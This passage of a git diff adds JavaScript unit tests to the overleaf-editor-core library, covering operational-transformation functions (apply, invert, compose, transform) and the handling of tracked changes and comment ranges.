operation.insert(random.string(l), { + tracking: trackedChange, + commentIds: operationCommentIds, + }) + } else if (r < 0.4) { + operation.remove(l) + } else if (r < 0.5) { + operation.retain(l, { tracking: new ClearTrackingProps() }) + } else { + operation.retain(l, { tracking: trackedChange }) + } + } + if (Math.random() < 0.3) { + operation.insert(1 + random.string(10)) + } + return operation +} + +module.exports = randomTextOperation diff --git a/libraries/overleaf-editor-core/test/text_operation.test.js b/libraries/overleaf-editor-core/test/text_operation.test.js new file mode 100644 index 0000000..fa9bc62 --- /dev/null +++ b/libraries/overleaf-editor-core/test/text_operation.test.js @@ -0,0 +1,879 @@ +// @ts-check +// +// These tests are based on the OT.js tests: +// https://github.com/Operational-Transformation/ot.js/blob/ +// 8873b7e28e83f9adbf6c3a28ec639c9151a838ae/test/lib/test-text-operation.js +// +'use strict' + +const { expect } = require('chai') +const random = require('./support/random') +const randomOperation = require('./support/random_text_operation') + +const ot = require('..') +const TextOperation = ot.TextOperation +const StringFileData = require('../lib/file_data/string_file_data') +const { RetainOp, InsertOp, RemoveOp } = require('../lib/operation/scan_op') +const TrackingProps = require('../lib/file_data/tracking_props') +const ClearTrackingProps = require('../lib/file_data/clear_tracking_props') + +describe('TextOperation', function () { + const numTrials = 500 + + it('tracks base and target lengths', function () { + const o = new TextOperation() + expect(o.baseLength).to.equal(0) + expect(o.targetLength).to.equal(0) + o.retain(5) + expect(o.baseLength).to.equal(5) + expect(o.targetLength).to.equal(5) + o.insert('abc') + expect(o.baseLength).to.equal(5) + expect(o.targetLength).to.equal(8) + o.retain(2) + expect(o.baseLength).to.equal(7) + expect(o.targetLength).to.equal(10) + o.remove(2) + expect(o.baseLength).to.equal(9) + expect(o.targetLength).to.equal(10) + }) + + it('supports chaining', function () { + const o = new TextOperation() + .retain(5) + .retain(0) + .insert('lorem') + .insert('') + .remove('abc') + .remove(3) + .remove(0) + .remove('') + expect(o.ops.length).to.equal(3) + }) + + it('ignores empty operations', function () { + const o = new TextOperation() + o.retain(0) + o.insert('') + o.remove('') + expect(o.ops.length).to.equal(0) + }) + + it('checks for equality', function () { + const op1 = new TextOperation().remove(1).insert('lo').retain(2).retain(3) + const op2 = new TextOperation().remove(-1).insert('l').insert('o').retain(5) + expect(op1.equals(op2)).to.be.true + op1.remove(1) + op2.retain(1) + expect(op1.equals(op2)).to.be.false + }) + + it('merges ops', function () { + function last(arr) { + return arr[arr.length - 1] + } + const o = new TextOperation() + expect(o.ops.length).to.equal(0) + o.retain(2) + expect(o.ops.length).to.equal(1) + expect(last(o.ops).equals(new RetainOp(2))).to.be.true + o.retain(3) + expect(o.ops.length).to.equal(1) + expect(last(o.ops).equals(new RetainOp(5))).to.be.true + o.insert('abc') + expect(o.ops.length).to.equal(2) + expect(last(o.ops).equals(new InsertOp('abc'))).to.be.true + o.insert('xyz') + expect(o.ops.length).to.equal(2) + expect(last(o.ops).equals(new InsertOp('abcxyz'))).to.be.true + o.remove('d') + expect(o.ops.length).to.equal(3) + expect(last(o.ops).equals(new RemoveOp(1))).to.be.true + o.remove('d') + expect(o.ops.length).to.equal(3) + expect(last(o.ops).equals(new RemoveOp(2))).to.be.true + }) + + it('checks for no-ops', function () { + const o = new TextOperation() + expect(o.isNoop()).to.be.true + o.retain(5) + expect(o.isNoop()).to.be.true + o.retain(3) + expect(o.isNoop()).to.be.true + o.insert('lorem') + expect(o.isNoop()).to.be.false + }) + + it('converts to string', function () { + const o = new TextOperation() + o.retain(2) + o.insert('lorem') + o.remove('ipsum') + o.retain(5) + expect(o.toString()).to.equal( + "retain 2, insert 'lorem', remove 5, retain 5" + ) + }) + + it('converts from JSON', function () { + const ops = [2, -1, -1, 'cde'] + const o = TextOperation.fromJSON({ textOperation: ops }) + expect(o.ops.length).to.equal(3) + expect(o.baseLength).to.equal(4) + expect(o.targetLength).to.equal(5) + + function assertIncorrectAfter(fn) { + const ops2 = ops.slice(0) + fn(ops2) + expect(() => { + TextOperation.fromJSON({ textOperation: ops2 }) + }).to.throw + } + + assertIncorrectAfter(ops2 => { + ops2.push({ insert: 'x' }) + }) + assertIncorrectAfter(ops2 => { + ops2.push(null) + }) + }) + + it( + 'applies (randomised)', + random.test(numTrials, () => { + const str = random.string(50) + const comments = random.comments(6) + const o = randomOperation(str, comments.ids) + expect(str.length).to.equal(o.baseLength) + const file = new StringFileData(str, comments.comments) + o.apply(file) + const result = file.getContent() + expect(result.length).to.equal(o.targetLength) + }) + ) + + it( + 'converts to/from JSON (randomised)', + random.test(numTrials, () => { + const doc = random.string(50) + const comments = random.comments(2) + const operation = randomOperation(doc, comments.ids) + const roundTripOperation = TextOperation.fromJSON(operation.toJSON()) + expect(operation.equals(roundTripOperation)).to.be.true + }) + ) + + it('throws when invalid operations are applied', function () { + const operation = new TextOperation().retain(1) + expect(() => { + operation.apply(new StringFileData('')) + }).to.throw(TextOperation.ApplyError) + expect(() => { + operation.apply(new StringFileData(' ')) + }).not.to.throw + }) + + it('throws when insert text contains non BMP chars', function () { + const operation = new TextOperation() + const str = '𝌆\n' + expect(() => { + operation.insert(str) + }).to.throw( + TextOperation.UnprocessableError, + /inserted text contains non BMP characters/ + ) + }) + + it('throws when base string contains non BMP chars', function () { + const operation = new TextOperation() + const str = '𝌆\n' + expect(() => { + operation.apply(new StringFileData(str)) + }).to.throw( + TextOperation.UnprocessableError, + /string contains non BMP characters/ + ) + }) + + it('throws at from JSON when it contains non BMP chars', function () { + const operation = ['𝌆\n'] + expect(() => { + TextOperation.fromJSON({ textOperation: operation }) + }).to.throw( + TextOperation.UnprocessableError, + /inserted text contains non BMP characters/ + ) + }) + + describe('invert', function () { + it( + 'inverts (randomised)', + random.test(numTrials, () => { + const str = random.string(50) + const comments = random.comments(6) + const o = randomOperation(str, comments.ids) + const originalFile = new StringFileData(str, comments.comments) + const p = o.invert(originalFile) + expect(o.baseLength).to.equal(p.targetLength) + expect(o.targetLength).to.equal(p.baseLength) + const file = new StringFileData(str, comments.comments) + o.apply(file) + p.apply(file) + const result = file.toRaw() + expect(result).to.deep.equal(originalFile.toRaw()) + }) + ) + + it('re-inserts removed range and comment when inverting', function () { + expectInverseToLeadToInitialState( + new StringFileData( + 'foo bar baz', + [{ id: 'comment1', ranges: [{ pos: 4, length: 3 }] }], + [ + { + range: { pos: 4, length: 3 }, + tracking: { + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }, + }, + ] + ), + new TextOperation().retain(4).remove(4).retain(3) + ) + }) + + it('deletes inserted range and comment when inverting', function () { + expectInverseToLeadToInitialState( + new StringFileData('foo baz', [ + { id: 'comment1', ranges: [], resolved: false }, + ]), + new TextOperation() + .retain(4) + .insert('bar', { + commentIds: ['comment1'], + tracking: TrackingProps.fromRaw({ + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }), + }) + .insert(' ') + .retain(3) + ) + }) + + it('removes a tracked delete', function () { + expectInverseToLeadToInitialState( + new StringFileData('foo bar baz'), + new TextOperation() + .retain(4) + .retain(4, { + tracking: TrackingProps.fromRaw({ + ts: '2023-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user1', + }), + }) + .retain(3) + ) + }) + + it('restores comments that were removed', function () { + expectInverseToLeadToInitialState( + new StringFileData('foo bar baz', [ + { + id: 'comment1', + ranges: [{ pos: 4, length: 3 }], + resolved: false, + }, + ]), + new TextOperation().retain(4).remove(4).retain(3) + ) + }) + + it('re-inserting removed part of comment restores original comment range', function () { + expectInverseToLeadToInitialState( + new StringFileData('foo bar baz', [ + { + id: 'comment1', + ranges: [{ pos: 0, length: 11 }], + resolved: false, + }, + ]), + new TextOperation().retain(4).remove(4).retain(3) + ) + }) + + it('re-inserting removed part of tracked change restores tracked change range', function () { + expectInverseToLeadToInitialState( + new StringFileData('foo bar baz', undefined, [ + { + range: { pos: 0, length: 11 }, + tracking: { + ts: '2023-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user1', + }, + }, + ]), + new TextOperation().retain(4).remove(4).retain(3) + ) + }) + }) + + describe('compose', function () { + it( + 'composes (randomised)', + random.test(numTrials, () => { + // invariant: apply(str, compose(a, b)) === apply(apply(str, a), b) + const str = random.string(20) + const comments = random.comments(6) + const a = randomOperation(str, comments.ids) + const file = new StringFileData(str, comments.comments) + a.apply(file) + const afterA = file.toRaw() + expect(afterA.content.length).to.equal(a.targetLength) + const b = randomOperation(afterA.content, comments.ids) + b.apply(file) + const afterB = file.toRaw() + expect(afterB.content.length).to.equal(b.targetLength) + const ab = a.compose(b) + expect(ab.targetLength).to.equal(b.targetLength) + ab.apply(new StringFileData(str, comments.comments)) + const afterAB = file.toRaw() + expect(afterAB).to.deep.equal(afterB) + }) + ) + + it('composes two operations with comments', function () { + expect( + compose( + new StringFileData('foo baz', [ + { id: 'comment1', ranges: [], resolved: false }, + ]), + new TextOperation() + .retain(4) + .insert('bar', { + commentIds: ['comment1'], + tracking: TrackingProps.fromRaw({ + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }), + }) + .insert(' ') + .retain(3), + new TextOperation().retain(4).remove(4).retain(3) + ) + ).to.deep.equal({ + content: 'foo baz', + comments: [{ id: 'comment1', ranges: [] }], + }) + }) + + it('prioritizes tracked changes info from the latter operation', function () { + expect( + compose( + new StringFileData('foo bar baz'), + new TextOperation() + .retain(4) + .retain(4, { + tracking: TrackingProps.fromRaw({ + ts: '2023-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user1', + }), + }) + .retain(3), + new TextOperation() + .retain(4) + .retain(4, { + tracking: TrackingProps.fromRaw({ + ts: '2024-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user2', + }), + }) + .retain(3) + ) + ).to.deep.equal({ + content: 'foo bar baz', + trackedChanges: [ + { + range: { pos: 4, length: 4 }, + tracking: { + ts: '2024-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user2', + }, + }, + ], + }) + }) + + it('does not remove tracked change if not overriden by operation 2', function () { + expect( + compose( + new StringFileData('foo bar baz'), + new TextOperation() + .retain(4) + .retain(4, { + tracking: TrackingProps.fromRaw({ + ts: '2023-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user1', + }), + }) + .retain(3), + new TextOperation().retain(11) + ) + ).to.deep.equal({ + content: 'foo bar baz', + trackedChanges: [ + { + range: { pos: 4, length: 4 }, + tracking: { + ts: '2023-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user1', + }, + }, + ], + }) + }) + + it('adds comment ranges from both operations', function () { + expect( + compose( + new StringFileData('foo bar baz', [ + { + id: 'comment1', + ranges: [{ pos: 4, length: 3 }], + resolved: false, + }, + { + id: 'comment2', + ranges: [{ pos: 8, length: 3 }], + resolved: false, + }, + ]), + new TextOperation() + .retain(5) + .insert('aa', { + commentIds: ['comment1'], + }) + .retain(6), + new TextOperation() + .retain(11) + .insert('bb', { commentIds: ['comment2'] }) + .retain(2) + ) + ).to.deep.equal({ + content: 'foo baaar bbbaz', + comments: [ + { id: 'comment1', ranges: [{ pos: 4, length: 5 }] }, + { id: 'comment2', ranges: [{ pos: 10, length: 5 }] }, + ], + }) + }) + + it('it removes the tracking range from a tracked delete if operation 2 resolves it', function () { + expect( + compose( + new StringFileData('foo bar baz'), + new TextOperation() + .retain(4) + .retain(4, { + tracking: TrackingProps.fromRaw({ + ts: '2023-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user1', + }), + }) + .retain(3), + new TextOperation() + .retain(4) + .retain(4, { + tracking: new ClearTrackingProps(), + }) + .retain(3) + ) + ).to.deep.equal({ + content: 'foo bar baz', + }) + }) + + it('it removes the tracking from an insert if operation 2 resolves it', function () { + expect( + compose( + new StringFileData('foo bar baz'), + new TextOperation() + .retain(4) + .insert('quux ', { + tracking: TrackingProps.fromRaw({ + ts: '2023-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }), + }) + .retain(7), + new TextOperation() + .retain(6) + .retain(5, { + tracking: new ClearTrackingProps(), + }) + .retain(5) + ) + ).to.deep.equal({ + content: 'foo quux bar baz', + trackedChanges: [ + { + range: { pos: 4, length: 2 }, + tracking: { + ts: '2023-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }, + }, + ], + }) + }) + }) + + describe('transform', function () { + it( + 'transforms (randomised)', + random.test(numTrials, () => { + // invariant: compose(a, b') = compose(b, a') + // where (a', b') = transform(a, b) + const str = random.string(20) + const comments = random.comments(6) + const a = randomOperation(str, comments.ids) + const b = randomOperation(str, comments.ids) + const primes = TextOperation.transform(a, b) + const aPrime = primes[0] + const bPrime = primes[1] + const abPrime = a.compose(bPrime) + const baPrime = b.compose(aPrime) + const abFile = new StringFileData(str, comments.comments) + const baFile = new StringFileData(str, comments.comments) + abPrime.apply(abFile) + baPrime.apply(baFile) + expect(abPrime.equals(baPrime)).to.be.true + expect(abFile.toRaw()).to.deep.equal(baFile.toRaw()) + }) + ) + + it('adds a tracked change from operation 1', function () { + expect( + transform( + new StringFileData('foo baz'), + new TextOperation() + .retain(4) + .insert('bar', { + tracking: TrackingProps.fromRaw({ + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }), + }) + .insert(' ') + .retain(3), + new TextOperation().retain(7).insert(' qux') + ) + ).to.deep.equal({ + content: 'foo bar baz qux', + trackedChanges: [ + { + range: { pos: 4, length: 3 }, + tracking: { + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }, + }, + ], + }) + }) + + it('prioritizes tracked change from the first operation', function () { + expect( + transform( + new StringFileData('foo bar baz'), + new TextOperation() + .retain(4) + .retain(4, { + tracking: TrackingProps.fromRaw({ + ts: '2023-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user1', + }), + }) + .retain(3), + new TextOperation() + .retain(4) + .retain(4, { + tracking: TrackingProps.fromRaw({ + ts: '2024-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user2', + }), + }) + .retain(3) + ) + ).to.deep.equal({ + content: 'foo bar baz', + trackedChanges: [ + { + range: { pos: 4, length: 4 }, + tracking: { + ts: '2023-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user1', + }, + }, + ], + }) + }) + + it('splits a tracked change in two to resolve conflicts', function () { + expect( + transform( + new StringFileData('foo bar baz'), + new TextOperation() + .retain(4) + .retain(4, { + tracking: TrackingProps.fromRaw({ + ts: '2023-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user1', + }), + }) + .retain(3), + new TextOperation() + .retain(4) + .retain(5, { + tracking: TrackingProps.fromRaw({ + ts: '2024-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user2', + }), + }) + .retain(2) + ) + ).to.deep.equal({ + content: 'foo bar baz', + trackedChanges: [ + { + range: { pos: 4, length: 4 }, + tracking: { + ts: '2023-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user1', + }, + }, + { + range: { pos: 8, length: 1 }, + tracking: { + ts: '2024-01-01T00:00:00.000Z', + type: 'delete', + userId: 'user2', + }, + }, + ], + }) + }) + + it('inserts a tracked change from operation 2 after a tracked change from operation 1', function () { + expect( + transform( + new StringFileData('aaabbbccc'), + new TextOperation() + .retain(3) + .insert('xxx', { + tracking: TrackingProps.fromRaw({ + ts: '2023-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }), + }) + .retain(6), + new TextOperation() + .retain(3) + .insert('yyy', { + tracking: TrackingProps.fromRaw({ + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user2', + }), + }) + .retain(6) + ) + ).to.deep.equal({ + content: 'aaaxxxyyybbbccc', + trackedChanges: [ + { + range: { pos: 3, length: 3 }, + tracking: { + ts: '2023-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }, + }, + { + range: { pos: 6, length: 3 }, + tracking: { + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user2', + }, + }, + ], + }) + }) + + it('preserves a comment even if it is completely removed in one operation', function () { + expect( + transform( + new StringFileData('foo bar baz', [ + { + id: 'comment1', + ranges: [{ pos: 4, length: 3 }], + resolved: false, + }, + ]), + new TextOperation().retain(4).remove(4).retain(3), + new TextOperation() + .retain(7) + .insert('qux ', { + commentIds: ['comment1'], + }) + .retain(4) + ) + ).to.deep.equal({ + content: 'foo qux baz', + comments: [{ id: 'comment1', ranges: [{ pos: 4, length: 4 }] }], + }) + }) + + it('extends a comment to both ranges if both operations add text in it', function () { + expect( + transform( + new StringFileData('foo bar baz', [ + { + id: 'comment1', + ranges: [{ pos: 4, length: 3 }], + resolved: false, + }, + ]), + new TextOperation() + .retain(4) + .insert('qux ', { + commentIds: ['comment1'], + }) + .retain(7), + new TextOperation() + .retain(4) + .insert('corge ', { commentIds: ['comment1'] }) + .retain(7) + ) + ).to.deep.equal({ + content: 'foo qux corge bar baz', + comments: [{ id: 'comment1', ranges: [{ pos: 4, length: 13 }] }], + }) + }) + + it('adds a tracked change from both operations at different places', function () { + expect( + transform( + new StringFileData('foo bar baz'), + new TextOperation() + .retain(4) + .insert('qux ', { + tracking: TrackingProps.fromRaw({ + ts: '2023-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }), + }) + .retain(7), + new TextOperation() + .retain(8) + .insert('corge ', { + tracking: TrackingProps.fromRaw({ + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user2', + }), + }) + .retain(3) + ) + ).to.deep.equal({ + content: 'foo qux bar corge baz', + trackedChanges: [ + { + range: { pos: 4, length: 4 }, + tracking: { + ts: '2023-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user1', + }, + }, + { + range: { pos: 12, length: 6 }, + tracking: { + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + userId: 'user2', + }, + }, + ], + }) + }) + }) +}) + +function expectInverseToLeadToInitialState(fileData, operation) { + const initialState = fileData + const result = initialState.toRaw() + const invertedOperation = operation.invert(initialState) + operation.apply(initialState) + invertedOperation.apply(initialState) + const invertedResult = initialState.toRaw() + expect(invertedResult).to.deep.equal(result) +} + +function compose(fileData, op1, op2) { + const copy = StringFileData.fromRaw(fileData.toRaw()) + op1.apply(fileData) + op2.apply(fileData) + const result1 = fileData.toRaw() + + const composed = op1.compose(op2) + composed.apply(copy) + const result2 = copy.toRaw() + + expect(result1).to.deep.equal(result2) + return fileData.toRaw() +} + +function transform(fileData, a, b) { + const initialState = fileData + const aFileData = StringFileData.fromRaw(initialState.toRaw()) + const bFileData = StringFileData.fromRaw(initialState.toRaw()) + + const [aPrime, bPrime] = TextOperation.transform(a, b) + a.apply(aFileData) + bPrime.apply(aFileData) + b.apply(bFileData) + aPrime.apply(bFileData) + + const resultA = aFileData.toRaw() + const resultB = bFileData.toRaw() + expect(resultA).to.deep.equal(resultB) + + return aFileData.toRaw() +} diff --git a/libraries/overleaf-editor-core/test/tracked_change.test.js b/libraries/overleaf-editor-core/test/tracked_change.test.js new file mode 100644 index 0000000..8837812 --- /dev/null +++ b/libraries/overleaf-editor-core/test/tracked_change.test.js @@ -0,0 +1,55 @@ +// @ts-check +const TrackedChange = require('../lib/file_data/tracked_change') +const Range = require('../lib/range') +const TrackingProps = require('../lib/file_data/tracking_props') +const { expect } = require('chai') + +describe('TrackedChange', function () { + it('should survive serialization', function () { + const trackedChange = new TrackedChange( + new Range(1, 2), + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + const newTrackedChange = TrackedChange.fromRaw(trackedChange.toRaw()) + expect(newTrackedChange).to.be.instanceOf(TrackedChange) + expect(newTrackedChange).to.deep.equal(trackedChange) + }) + + it('can be created from a raw object', function () { + const trackedChange = TrackedChange.fromRaw({ + range: { pos: 1, length: 2 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }) + expect(trackedChange).to.be.instanceOf(TrackedChange) + expect(trackedChange).to.deep.equal( + new TrackedChange( + new Range(1, 2), + new TrackingProps( + 'insert', + 'user1', + new Date('2024-01-01T00:00:00.000Z') + ) + ) + ) + }) + + it('can be serialized to a raw object', function () { + const change = new TrackedChange( + new Range(1, 2), + new TrackingProps('insert', 'user1', new Date('2024-01-01T00:00:00.000Z')) + ) + expect(change).to.be.instanceOf(TrackedChange) + expect(change.toRaw()).to.deep.equal({ + range: { pos: 1, length: 2 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }) + }) +}) diff --git a/libraries/overleaf-editor-core/test/tracked_change_list.test.js b/libraries/overleaf-editor-core/test/tracked_change_list.test.js new file mode 100644 index 0000000..6cf47f0 --- /dev/null +++ b/libraries/overleaf-editor-core/test/tracked_change_list.test.js @@ -0,0 +1,869 @@ +// @ts-check +const TrackedChangeList = require('../lib/file_data/tracked_change_list') +const TrackingProps = require('../lib/file_data/tracking_props') +const ClearTrackingProps = require('../lib/file_data/clear_tracking_props') +const { expect } = require('chai') +/** @import { TrackedChangeRawData } from '../lib/types' */ + +describe('TrackedChangeList', function () { + describe('applyInsert', function () { + describe('with same author', function () { + it('should merge consecutive tracked changes and use the latest timestamp', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 3 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(3, 'foo', { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(1) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 6 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should extend tracked changes when inserting in the middle', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(5, 'foobar', { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(1) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 16 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should merge two tracked changes starting at the same position', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 3 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(0, 'foo', { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(1) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 6 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should not extend range when there is a gap between the ranges', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 3 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(4, 'foobar', { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(2) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 3 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 4, length: 6 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should not merge tracked changes if there is a space between them', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 5, length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(4, 'foo', { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(2) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 4, length: 3 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 8, length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + }) + + describe('with different authors', function () { + it('should not merge consecutive tracked changes', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 3 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(3, 'foo', { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(2) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 3 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 3, length: 3 }, + tracking: { + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should not merge tracked changes at same position', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 3 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(0, 'foo', { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(2) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 3 }, + tracking: { + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 3, length: 3 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should insert tracked changes in the middle of a tracked range', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(5, 'foobar', { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(3) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 5, length: 6 }, + tracking: { + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 11, length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should insert tracked changes at the end of a tracked range', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(5, 'foobar', { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(2) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 5, length: 6 }, + tracking: { + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should split a track range when inserting at last contained cursor', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(4, 'foobar', { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(3) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 4 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 4, length: 6 }, + tracking: { + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 10, length: 1 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should insert a new range if inserted just before the first cursor of a tracked range', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 5, length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(5, 'foobar', { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(2) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 5, length: 6 }, + tracking: { + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 11, length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + }) + }) + + describe('applyDelete', function () { + it('should shrink tracked changes', function () { + const 